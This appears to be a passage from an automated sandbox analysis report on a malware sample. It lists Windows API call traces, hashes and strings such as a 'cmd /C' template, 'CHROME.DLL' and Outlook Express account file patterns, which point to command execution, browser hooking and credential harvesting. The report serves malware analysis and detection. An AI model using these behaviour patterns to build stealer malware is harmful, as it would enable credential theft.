  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false